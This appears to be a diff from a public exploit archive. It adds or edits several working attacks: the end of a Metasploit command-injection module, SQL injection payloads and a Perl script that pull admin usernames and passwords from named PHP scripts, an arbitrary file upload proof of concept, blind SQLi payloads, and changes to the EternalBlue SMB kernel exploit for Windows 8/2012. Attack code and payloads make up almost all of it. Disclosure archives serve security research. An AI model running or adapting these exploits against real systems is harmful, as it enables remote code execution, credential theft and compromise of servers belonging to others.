||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
|
||||
'vars_get' => {
|
||||
'applianceUid' => 'LOCALUID',
|
||||
'typeOf' => 'debug'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("iToken")
|
||||
res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
# If we've managed to get token, that means target is most likely vulnerable.
|
||||
token = get_token
|
||||
if token.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Get iToken from unauthenticated accessible endpoint
|
||||
print_status('Extracting iToken value')
|
||||
token = get_token
|
||||
|
||||
if token.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Awesome. iToken value = #{token}")
|
||||
end
|
||||
|
||||
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
|
||||
print_status('Trigerring command injection vulnerability with iToken value.')
|
||||
r = rand_text_alpha(5 + rand(3));
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
|
||||
'vars_post' => {
|
||||
'iToken' => token,
|
||||
'tag' => 'tunnel',
|
||||
'stime' => r,
|
||||
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
|
@ -33,6 +33,5 @@ Steps to Reproduce:
|
|||
|
||||
3. Solution:
|
||||
|
||||
The issue is now patched by the vendor
|
||||
https://github.com/thorsten/phpMyFAQ/commit/30b0025e19bd95ba28f4eff4d259671e7bb6bb86
|
||||
This vulnerability will be fixed in phpMyFAQ 2.9.9
|
||||
|
||||
|
|
27
platforms/php/webapps/42770.txt
Executable file
27
platforms/php/webapps/42770.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# # # # #
|
||||
# Exploit Title: Lending And Borrowing Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 22.09.2017
|
||||
# Vendor Homepage: http://www.i-netsolution.com/
|
||||
# Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/
|
||||
# Demo: http://74.124.215.220/~realfund/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/single-cause.php?pid=[SQL]
|
||||
#
|
||||
# -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+-
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
30
platforms/php/webapps/42771.txt
Executable file
30
platforms/php/webapps/42771.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# # # # #
|
||||
# Exploit Title: Multi Level Marketing Script - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 22.09.2017
|
||||
# Vendor Homepage: http://www.i-netsolution.com/
|
||||
# Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/
|
||||
# Demo: http://74.124.215.220/~advaemlm/
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/service_detail.php?pid=[SQL]
|
||||
#
|
||||
# -8'++/*!00002UNION*/+/*!00002ALL*/+/*!00002SELECT*/+0x31,0x494853414e2053454e43414e,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x307833313330,0x3131,(/*!00002SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!00002FROM*/+INFORMATION_SCHEMA.TABLES+/*!00002WHERE*/+TABLE_SCHEMA=DATABASE()),0x3133,0x3134,0x3135,0x3136,0x3137--+-
|
||||
#
|
||||
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
|
||||
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
59
platforms/php/webapps/42772.pl
Executable file
59
platforms/php/webapps/42772.pl
Executable file
|
@ -0,0 +1,59 @@
|
|||
#!/usr/bin/perl -w
|
||||
# # # # #
|
||||
# Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 22.09.2017
|
||||
# Vendor Homepage: http://cashbackcomparisonscript.com/
|
||||
# Software Link: http://cashbackcomparisonscript.com/demo/features/
|
||||
# Demo: http://www.cashbackcomparison.info/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-14703
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
sub clear{
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
|
||||
clear();
|
||||
print "
|
||||
################################################################################
|
||||
#### ## ## ###### ### ## ##
|
||||
## ## ## ## ## ## ## ### ##
|
||||
## ## ## ## ## ## #### ##
|
||||
## ######### ###### ## ## ## ## ##
|
||||
## ## ## ## ######### ## ####
|
||||
## ## ## ## ## ## ## ## ###
|
||||
#### ## ## ###### ## ## ## ##
|
||||
|
||||
###### ######## ## ## ###### ### ## ##
|
||||
## ## ## ### ## ## ## ## ## ### ##
|
||||
## ## #### ## ## ## ## #### ##
|
||||
###### ###### ## ## ## ## ## ## ## ## ##
|
||||
## ## ## #### ## ######### ## ####
|
||||
## ## ## ## ### ## ## ## ## ## ###
|
||||
###### ######## ## ## ###### ## ## ## ##
|
||||
Cash Back Comparison Script 1.0 - SQL Injection
|
||||
################################################################################
|
||||
";
|
||||
use LWP::UserAgent;
|
||||
print "\nInsert Target:[http://site.com/path/]: ";
|
||||
chomp(my $target=<STDIN>);
|
||||
print "\n[!] Exploiting Progress.....\n";
|
||||
print "\n";
|
||||
$cc="/*!01116concat*/(0x3c74657874617265613e,0x557365726e616d653a,username,0x20,0x506173733a,password,0x3c2f74657874617265613e)";
|
||||
$tt="users";
|
||||
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
||||
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
|
||||
$host = $target . "search/EfE'+/*!01116UNIoN*/+/*!01116SeLecT*/+0x31,0x32,0x33,0x34,0x35,0x36,".$cc.",0x38/*!50000FrOm*/".$tt."--+-.html";
|
||||
$res = $b->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
|
||||
print "[+] Success !!!\n";
|
||||
print "\n[+] Admin Detail : $1\n";
|
||||
print "\n[+]$target/admin/login.php\n";
|
||||
print "\n";
|
||||
}
|
||||
else{print "\n[-]Not found.\n";
|
||||
}
|
73
platforms/php/webapps/42773.txt
Executable file
73
platforms/php/webapps/42773.txt
Executable file
|
@ -0,0 +1,73 @@
|
|||
# # # # #
|
||||
# Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 22.09.2017
|
||||
# Vendor Homepage: https://www.claydip.com/
|
||||
# Software Link: https://www.claydip.com/airbnb-clone.html
|
||||
# Demo: https://www.claydip.com/airbnb_demo.html
|
||||
# Version: N/A
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2017-14704
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
#
|
||||
# The vulnerability allows an users upload arbitrary file....
|
||||
#
|
||||
# Vulnerable Source:
|
||||
#
|
||||
# .............1
|
||||
# public function imageSubmit(Request $request)
|
||||
# {
|
||||
$this->validate($request, [
|
||||
'image' => 'image|mimes:jpeg,png,jpg,gif,svg|max:2048',
|
||||
]);
|
||||
# if ($request->hasFile('profile_img_name')) {
|
||||
# $file = $request->file('profile_img_name');
|
||||
# //getting timestamp
|
||||
# $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
|
||||
# $img_name = $timestamp. '-' .$file->getClientOriginalName();
|
||||
# //$image->filePath = $img_name;
|
||||
# $file->move(public_path().'/images/profile', $img_name);
|
||||
# $postData = array('profile_img_name' => $img_name, 'profile_photo_approve' => 0);
|
||||
# $user = $this->userRepository->updateUser($postData);
|
||||
# flash('Profile Image Updated Successfully', 'success');
|
||||
# if($request->get('uploadpage') == 2) {
|
||||
# return \Redirect::to('user/edit/uploadphoto');
|
||||
# }
|
||||
# return \Redirect::to('user/dashboard');
|
||||
# }
|
||||
#
|
||||
# }
|
||||
# .............2
|
||||
# public function proof_submit(Request $request)
|
||||
# {
|
||||
# if ($request->hasFile('profile_img_name')) {
|
||||
# $file = $request->file('profile_img_name');
|
||||
# //getting timestamp
|
||||
# $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
|
||||
# $img_name = $timestamp. '-' .$file->getClientOriginalName();
|
||||
# //$image->filePath = $img_name;
|
||||
# $file->move(public_path().'/images/proof', $img_name);
|
||||
# $postData = array('idproof_img_src' => $img_name, 'id_proof_approved' => 0);
|
||||
# $user = $this->userRepository->updateUser($postData);
|
||||
# flash('Proof Updated Successfully', 'success');
|
||||
# return \Redirect::to('user/edit/uploadproof');
|
||||
# }
|
||||
#
|
||||
# }
|
||||
# .............
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/user/edit/uploadphoto
|
||||
# http://localhost/[PATH]/user/edit/uploadproof
|
||||
#
|
||||
# http://localhost/[PATH]/images/profile/[$timestamp].Php
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
41
platforms/php/webapps/42774.txt
Executable file
41
platforms/php/webapps/42774.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: Secure E-commerce Script v1.02 - SQL Injection
|
||||
# Date: 2017-09-22
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/
|
||||
# Version: 1.02
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-09-22
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Would you like to secure your Shopping Cart Script? We have the readymade solution for Secure Ecommerce Shopping Cart php that is making secure your online transaction.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [sid] parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
http://localhost/[path]/single_detail.php?sid=9 AND 5028=5028
|
||||
|
||||
Parameter: sid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: sid=9 AND 5028=5028
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: sid=9 AND SLEEP(5)
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
41
platforms/php/webapps/42775.txt
Executable file
41
platforms/php/webapps/42775.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection
|
||||
# Date: 2017-09-22
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: http://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/
|
||||
# Version: 1.6
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-09-22
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Start your own Auction website with our Readymade PHP Auction script.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
SQL injection on [detail] URI parameter.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
SQLi:
|
||||
|
||||
http://localhost/[path]/detail/xx AND 1053=1053/xxxxx
|
||||
|
||||
Parameter: #1* (URI)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: AND 1053=1053/xxxx
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: AND SLEEP(5)/xxxx
|
||||
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
|
@ -1,7 +1,7 @@
|
|||
|
||||
#!/usr/bin/python
|
||||
from impacket import smb
|
||||
from impacket import smb, ntlm
|
||||
from struct import pack
|
||||
import os
|
||||
import sys
|
||||
import socket
|
||||
|
||||
|
@ -9,15 +9,24 @@ import socket
|
|||
EternalBlue exploit for Windows 8 and 2012 by sleepya
|
||||
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
|
||||
The exploit support only x64 target
|
||||
|
||||
Tested on:
|
||||
- Windows 2012 R2 x64
|
||||
- Windows 8.1 x64
|
||||
- Windows 10 Pro Build 10240 x64
|
||||
|
||||
|
||||
Default Windows 8 and later installation without additional service info:
|
||||
- anonymous is not allowed to access any share (including IPC$)
|
||||
- tcp port 445 if filtered by firewall
|
||||
- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows
|
||||
- tcp port 445 is filtered by firewall
|
||||
|
||||
|
||||
Reference:
|
||||
- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
|
||||
- "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit
|
||||
|
||||
|
||||
Exploit info:
|
||||
- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at
|
||||
https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same
|
||||
|
@ -27,6 +36,8 @@ Exploit info:
|
|||
- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.
|
||||
- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)
|
||||
- See the code and comment for exploit detail.
|
||||
|
||||
|
||||
Disable NX method:
|
||||
- The idea is from "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" (see link in reference)
|
||||
- The exploit is also the same but we need to trigger bug twice
|
||||
|
@ -34,8 +45,17 @@ Disable NX method:
|
|||
- Write '\x00' to disable the NX flag
|
||||
- Second trigger, do the same as Windows 7 exploit
|
||||
- From my test, if exploit disable NX successfully, I always get code execution
|
||||
|
||||
# E-DB Note: https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e
|
||||
# E-DB Note: https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py
|
||||
'''
|
||||
|
||||
# if anonymous can access any share folder, 'IPC$' is always accessible.
|
||||
# authenticated user is always able to access 'IPC$'.
|
||||
# Windows 2012 does not allow anonymous to login if no share is accessible.
|
||||
USERNAME=''
|
||||
PASSWORD=''
|
||||
|
||||
# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000
|
||||
NTFEA_SIZE = 0x9000
|
||||
|
||||
|
@ -46,6 +66,7 @@ ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'*0x8148 # overflow to SRVNET_BU
|
|||
'''
|
||||
Reverse from srvnet.sys (Win2012 R2 x64)
|
||||
- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():
|
||||
|
||||
// size 0x90
|
||||
struct SRVNET_BUFFER_HDR {
|
||||
LIST_ENTRY list;
|
||||
|
@ -67,12 +88,14 @@ struct SRVNET_BUFFER_HDR {
|
|||
char unknown7[12];
|
||||
char unknown8[0x20];
|
||||
};
|
||||
|
||||
struct SRVNET_BUFFER {
|
||||
char transportHeader[80]; // 0x50
|
||||
char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)
|
||||
SRVNET_BUFFER_HDR hdr; //some header size 0x90
|
||||
//MDL mdl1; // target
|
||||
};
|
||||
|
||||
In Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.
|
||||
Because transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and
|
||||
DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.
|
||||
|
@ -116,14 +139,19 @@ If exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to cr
|
|||
# \x8b\x4a\x48 mov ecx, [rdx+0x48]
|
||||
# \x89\x4a\x40 mov [rdx+0x40], ecx
|
||||
|
||||
TARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode
|
||||
# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.
|
||||
# The 0xffffffffffd00000 address should be useable when debug mode is not enabled
|
||||
# The 0xffffffffffd01000 address should be useable when debug mode is enabled
|
||||
TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode
|
||||
|
||||
# Note: feaList will be created after knowing shellcode size.
|
||||
|
||||
# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa
|
||||
# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808
|
||||
# NX bit is at 0xfffff6ffffffe80f
|
||||
# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790
|
||||
# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800
|
||||
# NX bit is at PTE_ADDR+7
|
||||
# MappedSystemVa = PTE_ADDR+7 - 0x7f
|
||||
SHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000
|
||||
PTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)
|
||||
fakeSrvNetBufferX64Nx = '\x00'*16
|
||||
fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)
|
||||
fakeSrvNetBufferX64Nx += '\x00'*16
|
||||
|
@ -134,7 +162,7 @@ fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
|
|||
fakeSrvNetBufferX64Nx += '\x00'*16
|
||||
fakeSrvNetBufferX64Nx += '\x00'*16
|
||||
fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags
|
||||
fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa
|
||||
fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa
|
||||
|
||||
feaListNx = pack('<I', 0x10000)
|
||||
feaListNx += ntfea9000
|
||||
|
@ -144,11 +172,11 @@ feaListNx += pack('<BBH', 0x12, 0x34, 0x5678)
|
|||
|
||||
|
||||
def createFakeSrvNetBuffer(sc_size):
|
||||
# 0x200 is size of fakeSrvNetBufferX64
|
||||
totalRecvSize = 0x80 + 0x200 + sc_size
|
||||
# 0x180 is size of fakeSrvNetBufferX64
|
||||
totalRecvSize = 0x80 + 0x180 + sc_size
|
||||
fakeSrvNetBufferX64 = '\x00'*16
|
||||
fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer
|
||||
fakeSrvNetBufferX64 += '\x00'*16
|
||||
fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _
|
||||
fakeSrvNetBufferX64 += '\x00'*16
|
||||
fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40
|
||||
fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct
|
||||
|
@ -184,11 +212,11 @@ fake_recv_struct = ('\x00'*16)*5
|
|||
fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)
|
||||
fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60
|
||||
fake_recv_struct += ('\x00'*16)*10
|
||||
fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array
|
||||
fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array
|
||||
fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150
|
||||
fake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130
|
||||
fake_recv_struct += ('\x00'*16)*11
|
||||
fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address
|
||||
fake_recv_struct += ('\x00'*16)*3
|
||||
fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address
|
||||
|
||||
|
||||
def getNTStatus(self):
|
||||
|
@ -215,28 +243,18 @@ def sendEcho(conn, tid, data):
|
|||
print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
|
||||
|
||||
# do not know why Word Count can be 12
|
||||
# if word count is not 12, setting ByteCount without enough data will be failed
|
||||
class SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):
|
||||
structure = (
|
||||
('MaxBuffer','<H'),
|
||||
('MaxMpxCount','<H'),
|
||||
('VCNumber','<H'),
|
||||
('SessionKey','<L'),
|
||||
#('AnsiPwdLength','<H'),
|
||||
('UnicodePwdLength','<H'),
|
||||
('_reserved','<L=0'),
|
||||
('Capabilities','<L'),
|
||||
)
|
||||
# override SMB.neg_session() to allow forcing ntlm authentication
|
||||
class MYSMB(smb.SMB):
|
||||
def __init__(self, remote_host, use_ntlmv2=True):
|
||||
self.__use_ntlmv2 = use_ntlmv2
|
||||
smb.SMB.__init__(self, remote_host, remote_host)
|
||||
|
||||
def neg_session(self, extended_security = True, negPacket = None):
|
||||
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
|
||||
|
||||
def createSessionAllocNonPaged(target, size):
|
||||
# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function
|
||||
# You can see the allocation logic (even code is not the same) in WinNT4 source code
|
||||
# https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071
|
||||
conn = smb.SMB(target, target)
|
||||
conn = MYSMB(target, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set
|
||||
_, flags2 = conn.get_flags()
|
||||
# FLAGS2_EXTENDED_SECURITY MUST not be set
|
||||
flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY
|
||||
# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
|
||||
if size >= 0xffff:
|
||||
flags2 &= ~smb.SMB.FLAGS2_UNICODE
|
||||
|
@ -249,27 +267,49 @@ def createSessionAllocNonPaged(target, size):
|
|||
pkt = smb.NewSMBPacket()
|
||||
|
||||
sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
|
||||
sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()
|
||||
sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
|
||||
|
||||
sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size
|
||||
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value
|
||||
sessionSetup['Parameters']['VCNumber'] = os.getpid()
|
||||
sessionSetup['Parameters']['SessionKey'] = 0
|
||||
sessionSetup['Parameters']['AnsiPwdLength'] = 0
|
||||
sessionSetup['Parameters']['UnicodePwdLength'] = 0
|
||||
sessionSetup['Parameters']['Capabilities'] = 0x80000000
|
||||
sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size
|
||||
sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value
|
||||
sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero
|
||||
sessionSetup['Parameters']['SessionKey'] = 0
|
||||
sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session
|
||||
sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS
|
||||
|
||||
# set ByteCount here
|
||||
sessionSetup['Data'] = pack('<H', size) + '\x00'*20
|
||||
sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
|
||||
pkt.addCommand(sessionSetup)
|
||||
|
||||
conn.sendSMB(pkt)
|
||||
recvPkt = conn.recvSMB()
|
||||
if recvPkt.getNTStatus() == 0:
|
||||
print('SMB1 session setup allocate nonpaged pool success')
|
||||
else:
|
||||
print('SMB1 session setup allocate nonpaged pool failed')
|
||||
return conn
|
||||
return conn
|
||||
|
||||
if USERNAME:
|
||||
# Try login with valid user because anonymous user might get access denied on Windows Server 2012.
|
||||
# Note: If target allows only NTLMv2 authentication, the login will always fail.
|
||||
# support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)
|
||||
flags2 &= ~smb.SMB.FLAGS2_UNICODE
|
||||
reqSize = size // 2
|
||||
conn.set_flags(flags2=flags2)
|
||||
|
||||
# new SMB packet to reset flags
|
||||
pkt = smb.NewSMBPacket()
|
||||
pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(PASSWORD))
|
||||
# UnicodePasswordLen field is in Reserved for extended security format.
|
||||
sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)
|
||||
sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(USERNAME)) + pwd_unicode + USERNAME + '\x00'*16
|
||||
pkt.addCommand(sessionSetup)
|
||||
|
||||
conn.sendSMB(pkt)
|
||||
recvPkt = conn.recvSMB()
|
||||
if recvPkt.getNTStatus() == 0:
|
||||
print('SMB1 session setup allocate nonpaged pool success')
|
||||
return conn
|
||||
|
||||
# lazy to check error code, just print fail message
|
||||
print('SMB1 session setup allocate nonpaged pool failed')
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
# Note: impacket-0.9.15 struct has no ParameterDisplacement
|
||||
|
@ -324,12 +364,13 @@ def send_trans2_second(conn, tid, data, displacement):
|
|||
conn.sendSMB(pkt)
|
||||
|
||||
|
||||
def send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
|
||||
def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
|
||||
pkt = smb.NewSMBPacket()
|
||||
pkt['Tid'] = tid
|
||||
|
||||
command = pack('<H', setup)
|
||||
|
||||
# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
|
||||
transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
|
||||
transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
|
||||
transCommand['Parameters']['MaxSetupCount'] = 1
|
||||
|
@ -375,6 +416,7 @@ def send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLast
|
|||
print('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()))
|
||||
sys.exit(1)
|
||||
|
||||
# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
|
||||
i = firstDataFragmentSize
|
||||
while i < len(data):
|
||||
sendSize = min(4096, len(data) - i)
|
||||
|
@ -397,7 +439,7 @@ def createConnectionWithBigSMBFirst80(target, for_nx=False):
|
|||
# There is no need to be SMB2 because we want the target free the corrupted buffer.
|
||||
